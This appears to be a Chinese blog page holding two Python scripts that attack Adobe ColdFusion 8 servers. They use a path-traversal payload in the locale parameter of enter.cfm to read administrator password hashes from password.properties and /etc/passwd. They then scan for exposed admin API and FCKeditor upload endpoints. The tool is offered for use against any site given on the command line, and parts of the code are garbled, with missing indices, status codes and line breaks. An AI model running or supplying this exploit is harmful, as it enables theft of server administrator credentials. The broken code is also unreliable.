Coldfusion8 读取HASH工具
2024-09-04 13:55:17
#!/usr/bin/env python
#-*- coding:utf- -*-
import sys
import threading
import urllib
import httplib
class Mythread(threading.Thread):
def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en']
try:
for path in urls:
out = urllib.urlopen(self.host + path).read().split(r'</title>')[].split(r'<title>')[].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')
print out
except Exception:
print "Error connect time"
self.scanner()
def scanner(self):
#self.host = host
cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm',
'/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm',
'/CFIDE/adminapi/_datasource/geturldefaults.cfm',
'/CFIDE/adminapi/_datasource/setdsn.cfm',
'/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm',
'/CFIDE/adminapi/_datasource/setsldatasource.cfm',
'/CFIDE/adminapi/customtags/l10n.cfm',
'/CFIDE/debug/cf_debugFr.cfm',
'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'] i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"} for fckpath in cfmfck:
if self.host[:] == "https://":
conn = httplib.HTTPSConnection(self.host.replace("https://",""))
else:
conn = httplib.HTTPConnection(self.host.replace("http://",""))
conn.request('GET',fckpath,headers = i_headers)
r1 = conn.getresponse() if r1.status == or r1.status == or r1.status == :
print self.host + fckpath + " " + str(r1.status) if __name__ == "__main__":
Mythread(sys.argv[]).start()
#!/usr/bin/env python
# -*- coding: utf8 -*-
import sys , urllib , httplib , subprocess
def banner():
print """
#--------------------------------------------------#
# Welcome to www.90sec.org #
# THis is read ColdFusion sha1 Tool #
# python COldFusion.py www.WebSite.cn #
#--------------------------------------------------#
"""
urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en'] cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm','/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm','/CFIDE/adminapi/_datasource/geturldefaults.cfm','/CFIDE/adminapi/_datasource/setdsn.cfm','/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm','/CFIDE/adminapi/_datasource/setsldatasource.cfm','/CFIDE/adminapi/customtags/l10n.cfm','/CFIDE/debug/cf_debugFr.cfm','/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']
try:
host = sys.argv[1]
if len(host) < '':
banner()
for url in urls:
context = urllib.urlopen(host + url).read()
out = context.split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')
print out except Exception:
banner()
sys.exit() else:
for line in cfmfck:
host = host.replace("http://","")
line = line.replace("\n","")
line = "/" + line
website = host + line
connection = httplib.HTTPConnection(host)
connection.request("GET",line)
response = connection.getresponse()
if response.status == 200:
print website , ''
elif response.status == 403:
print website , ''
elif response.status == 500:
print website , 'server ERROR'
最新文章
- DataBase异常状态:Recovery Pending,Suspect,估计Recovery的剩余时间
- matlab 绘制条形图
- 让Web API支持$format参数的方法
- handler的理解笔记
- luvit 初尝鲜
- iOS开发--CornerStone上传静态库(.a文件)
- nyoj 86 找球号(一)
- 反射那些事儿——Java动态装载和反射技术
- 3步学会用gulp
- linux shell脚本连接oracle查询数据插入文件和日志文件中
- bresenham算法的FPGA的实现2
- linux下C语言socket网络编程简例
- 开发中关于IPv6的问题
- oozie调用java实例------Java action
- JAVAFX-3 开发应用
- Error filterStart的问题
- Python全栈-JavaScript】jQuery工具
- [C#] LINQ之SelectMany
- thinkpad那些事儿
- [Python]编码声明:是coding:utf-8还是coding=urf-8呢